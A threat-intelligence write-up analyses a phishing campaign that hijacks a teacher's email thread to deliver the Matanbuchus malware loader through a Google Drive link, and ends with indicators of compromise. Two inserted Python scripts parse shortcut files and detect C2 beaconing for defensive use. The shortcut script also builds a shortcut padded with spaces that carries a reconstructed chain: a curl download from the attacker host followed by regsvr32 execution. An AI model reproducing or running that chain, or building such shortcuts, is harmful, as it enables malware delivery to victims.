
Google Drive as a Distribution Method for Matanbuchus Malware

In this attack, threat actors impersonate a teacher to deliver Matanbuchus malware-as-a-service (MaaS) using a Google Drive link.

August 18, 2022

Initially launched in February 2021, Matanbuchus is a malware-as-a-service (MaaS) available on Russian-speaking cybercrime forums.

Similar to other malware loaders such as BazarLoader, Matanbuchus is malicious software designed to download and run second-stage executables from command and control (C&C or C2) servers without being detected. According to the Matanbuchus author, the loader can launch a .exe or .dll file in memory, run custom PowerShell commands, and more.

Abnormal recently observed a new approach to delivering the malware loader. Combining more convincing social engineering tactics with legitimate infrastructure—in this case Google Drive—threat actors are able to launch an attack that is significantly more difficult to detect.

Hijacking an Email Thread Using a Compromised Account

In June 2022, Abnormal detected an email purportedly sent by a teacher at a well-known school district. By hijacking an existing email thread, the attackers leveraged both the teacher's identity and the real school where she worked to avoid suspicion. The account used to deliver the mail also belongs to a legitimate domain, which is presumed to have been compromised.

The attackers combined several elements to appear credible to targets and to obfuscate the malware so that it bypasses email security. The diagram below shows the attack flow detected by Abnormal up to the point where the Matanbuchus loader is downloaded; the loader in turn retrieves further payloads, such as Cobalt Strike.

Figure 1: Matanbuchus malware attack flow

Threat Analysis

The impersonated party in this attack is a teacher employed by the school district who is also a member of a group that supports the school community. The attack begins with the hijacked thread from the teacher inviting recipients to the next community meeting. The message includes a Google Drive URL, which the threat actor claims links to a document related to the event.

Figure 2: Phishing email

The Google Drive link downloads a zip archive containing a LNK (Windows shortcut) file.

Figure 3: Zip file downloaded from the Google Drive link

The LNK file's target property carries the command-line argument that launches the second stage.

Figure 4: LNK properties

Only a small snippet of the target path is visible in the properties dialog; the command-line argument extends well beyond what the victim can see.

Figure 5: Complete argument in the LNK target property

The first step in this argument creates the hP folder and then checks for internet connectivity by pinging Mh4m[.]com and 4umz[.]com. The connectivity check targets benign domains so that it is not flagged as suspicious network traffic.

Figure 6: LNK file checking the internet connection

The second step downloads a second file with curl from https://re9cred[.]com/N9tIgZB/Wq[.]png. Despite the .png extension in the URL, the file is saved as uVbU.UEMX.pafB in the hidden directory ..\AppData\Roaming\hP, keeping it out of the victim's sight.

Figure 7: Second file downloaded via curl

The second file is executed with regsvr32. It has several domains it can reach out to for the third file, which increases the chance that the download succeeds.
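To recover the full command line that the shortcut properties dialog truncates, an analyst can parse the LNK directly rather than trust what Explorer shows. The following Python script is an added example, not part of the original analysis and not the attacker's tooling: it assembles a constructed Shell Link file in the MS-SHLLINK binary format, parses the StringData section back out, and runs a few triage checks over the arguments. The sample argument string is a reconstruction of the chain described above; the leading whitespace padding, the `ping -n 1` syntax, the curl and `regsvr32 /s` flags, and the 260-character visibility threshold are assumptions, since the real sample's command line is only partially visible in the figures.

```python
import re
import struct

# LinkFlags bits (MS-SHLLINK section 2.1.1)
HAS_LINK_TARGET_IDLIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that opens the window minimized

# CLSID 00021401-0000-0000-C000-000000000046 in on-disk byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# StringData fields appear in this fixed order when their flag bit is set
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def build_lnk(relative_path, working_dir, arguments, show_command=SW_SHOWMINNOACTIVE):
    """Assemble a minimal Shell Link: 76-byte header plus Unicode StringData, no IDList/LinkInfo."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack(
        "<I16sIIQQQIiIHHII",
        0x4C, LNK_CLSID, flags,
        0x20,             # FileAttributes: FILE_ATTRIBUTE_ARCHIVE
        0, 0, 0,          # creation/access/write FILETIMEs
        0, 0,             # FileSize, IconIndex
        show_command, 0,  # ShowCommand, HotKey
        0, 0, 0,          # Reserved1..3
    )
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, working_dir, arguments))
    return header + body


def parse_lnk(data):
    """Return the StringData fields and ShowCommand of a Shell Link file."""
    if len(data) < 0x4C:
        raise ValueError("not a Shell Link file")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    show_command = struct.unpack_from("<I", data, 60)[0]
    off = header_size
    if flags & HAS_LINK_TARGET_IDLIST:          # IDListSize counts only the list bytes
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                   # LinkInfoSize counts the whole structure
        off += struct.unpack_from("<I", data, off)[0]
    is_unicode = bool(flags & IS_UNICODE)
    fields = {"show_command": show_command}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, not bytes
        off += 2
        nbytes = count * 2 if is_unicode else count
        fields[name] = data[off:off + nbytes].decode("utf-16-le" if is_unicode else "cp1252")
        off += nbytes
    return fields


LOLBINS = re.compile(
    r"\b(cmd|powershell|pwsh|curl|certutil|bitsadmin|regsvr32|rundll32|mshta|"
    r"wscript|cscript|msiexec|ping|mkdir)\b", re.IGNORECASE)


def triage(fields, visible_chars=260):
    """Flag the traits seen in the LNK above. visible_chars is an assumed approximation
    of how much of the target the properties dialog displays."""
    args = fields.get("arguments", "")
    target = fields.get("relative_path", "") + " " + args
    return {
        "lolbins": sorted({m.lower() for m in LOLBINS.findall(args)}),
        "hidden_tail": len(target) > visible_chars,
        "leading_padding": args != args.lstrip(),
        "chained_commands": bool(re.search(r"\s(&&?|\|\|?)\s", args)),
        "runs_minimized": fields.get("show_command") == SW_SHOWMINNOACTIVE,
        "fetches_remote": bool(re.search(r"https?://", args, re.IGNORECASE)),
    }


# Constructed sample: a reconstruction of the chain described in the analysis,
# not bytes from the real LNK. Padding and exact flags are assumptions.
SAMPLE_ARGS = " " * 300 + (
    '/c mkdir "%APPDATA%\\hP" & ping -n 1 Mh4m[.]com & ping -n 1 4umz[.]com & '
    'curl -s "https://re9cred[.]com/N9tIgZB/Wq[.]png" -o "%APPDATA%\\hP\\uVbU.UEMX.pafB" & '
    'regsvr32 /s "%APPDATA%\\hP\\uVbU.UEMX.pafB"'
)
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\cmd.exe", "%APPDATA%", SAMPLE_ARGS)

if __name__ == "__main__":
    fields = parse_lnk(SAMPLE_LNK)
    print("target :", fields["relative_path"])
    print("args   :", fields["arguments"].strip())
    for key, value in triage(fields).items():
        print(f"{key:17}: {value}")
```

The parser reads the header, skips the optional LinkTargetIDList and LinkInfo structures, and then walks the five StringData fields in the order the format fixes, so the argument string comes back whole regardless of how much padding precedes it. The triage output is a starting point for a detection rule: a shortcut whose target is cmd.exe, whose arguments start with hundreds of spaces, chain several commands, reach out over HTTP and invoke curl and regsvr32 is worth blocking on arrival.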

Figure 8: Different C2s available to download Matanbuchus

The file connects to the C2 telemetryreporting[.]com at IP 31[.]41[.]244[.]234 and downloads the Matanbuchus payload. All of the network traffic is base64-encoded as an anti-detection technique.

Figure 9: Wireshark packets downloading the malware, encoded in base64

The Matanbuchus payload is saved in the hidden directory ..\AppData\Local\9e0a under the name x86.nls.

Figure 10: Malware saved in the local folder as x86.nls

After the download, the host keeps sending the same information to the C2 at 31[.]41[.]244[.]230 to maintain the established connection.

Figure 11: Connection established with the C2

As seen before, the traffic is base64-encoded.

Figure 12: HTTP POST request packet from the C2 network traffic

After decoding the base64 we can see several arguments, potentially related to the victim's system configuration.
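The repeated, identical, base64-encoded POSTs described above are what a network analyst would hunt for in proxy or web logs. The following Python script is an added example, not part of the original analysis: it groups POST requests by host and path, flags any group whose body never changes and whose request interval is near-constant, and base64-decodes the body for the analyst. The log records are constructed for the example, the timestamps and 60-second interval are assumptions, and the beacon body is a placeholder stand-in for a host profile; the real Matanbuchus C2 message format is not reproduced here.

```python
import base64
import binascii
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed records in a proxy-log-like shape: (timestamp, method, host, path, body).
# The body content is a placeholder, not the real C2 protocol.
BEACON_BODY = base64.b64encode(b"host=WIN10-LAB;user=jdoe;arch=x64;ver=19044").decode()
C2_HOST, C2_PATH = "telemetryreporting[.]com", "/mtaggsM/YmQzcuM/home.aspx"

SAMPLE_LOG = [
    ("2022-06-14T10:00:00", "POST", C2_HOST, C2_PATH, BEACON_BODY),
    ("2022-06-14T10:01:00", "POST", C2_HOST, C2_PATH, BEACON_BODY),
    ("2022-06-14T10:02:00", "POST", C2_HOST, C2_PATH, BEACON_BODY),
    ("2022-06-14T10:03:00", "POST", C2_HOST, C2_PATH, BEACON_BODY),
    ("2022-06-14T10:04:00", "POST", C2_HOST, C2_PATH, BEACON_BODY),
    # Legitimate-looking uploads: same endpoint, but varying bodies and irregular timing
    ("2022-06-14T10:00:12", "POST", "example.com", "/api/upload", base64.b64encode(b"file=a").decode()),
    ("2022-06-14T10:00:40", "POST", "example.com", "/api/upload", base64.b64encode(b"file=b").decode()),
    ("2022-06-14T10:03:05", "POST", "example.com", "/api/upload", base64.b64encode(b"file=c").decode()),
    ("2022-06-14T10:03:30", "POST", "example.com", "/api/upload", base64.b64encode(b"file=d").decode()),
    ("2022-06-14T10:02:00", "GET", "example.com", "/", ""),
]


def decode_b64(body):
    """Strictly decode a base64 body; return None when it is not valid base64."""
    try:
        return base64.b64decode(body, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None


def find_beacons(records, min_count=4, max_jitter=0.25):
    """Flag (host, path) pairs receiving at least min_count POSTs with an identical body
    at a near-constant interval. max_jitter is (max gap - min gap) / mean gap."""
    groups = defaultdict(list)
    for ts, method, host, path, body in records:
        if method == "POST":
            groups[(host, path)].append((datetime.fromisoformat(ts), body))

    alerts = []
    for (host, path), events in groups.items():
        if len(events) < min_count:
            continue
        events.sort()
        times = [t for t, _ in events]
        bodies = {b for _, b in events}
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.fmean(gaps)
        jitter = (max(gaps) - min(gaps)) / mean if mean > 0 else float("inf")
        if len(bodies) == 1 and jitter <= max_jitter:
            alerts.append({
                "host": host,
                "path": path,
                "count": len(events),
                "interval_s": mean,
                "decoded_body": decode_b64(events[0][1]),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_beacons(SAMPLE_LOG):
        print(f"beacon: {alert['count']} POSTs to {alert['host']}{alert['path']} "
              f"every {alert['interval_s']:.0f}s")
        print("decoded body:", alert["decoded_body"])
```

The two signals that matter are independent of the encoding: a body that never changes across many requests, and an interval with little variance. The base64 decode is there so the analyst can see what the implant is reporting; a loader that adds jitter or varies the body would need the thresholds relaxed or a longer observation window.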

Figure 13: Base64-decoded C2 network traffic

Blocking Advanced Malware Attacks

The threat actors used a powerful combination of tactics to launch this attack: impersonating a real teacher at a well-known school, sending from a legitimate but compromised domain, hosting the payload on Google Drive, and using a sophisticated malware loader. Because the attack is built on legitimate elements, it is easier to fool the target and carry out the multi-stage attack.

In addition, decoding the malicious code in memory makes it harder for security systems to detect the malware. A traditional email security platform would be incapable of stopping an attack of this complexity. Effectively blocking these kinds of attacks requires a solution designed specifically to detect these indicators of compromise.

Indicators of Compromise (IOCs)

SHA-256 hashes:

Zip file: 0a82b9ef75d1d2a3914e6609070da138ec4b724fc62753290d8c4fc51818d0a6
LNK file: 86fb578acbb309cfc693f21970a3ed5f678126161a177e2bdc4cb80d256aca8c
Malicious DLL: 3ab3a642a8a02b18ff39c664dc82a1b68bf7b1a8574a54838d75279d262d0737
Matanbuchus: 48ad2fadb0550066f0ee1d20b73cdb397c53479152c2f3d14fe7d09b8a972117

URLs:

Second-stage download: https://re9cred[.]com/N9tIgZB/Wq[.]png
C2: https://communicationreporting[.]com/mtaggsM/YmQzcuM/auth[.]aspx
C2: https://telemetryservic[.]com/mtaggsM/YmQzcuM/auth[.]aspx
C2: https://telemetryservic[.]com/mtaggsM/YmQzcuM/home[.]aspx
C2: http://telemetryreporting[.]com/mtaggsM/YmQzcuM/home[.]aspx
C2: http://updatesservic[.]com/mtaggsM/YmQzcuM/home[.]aspx
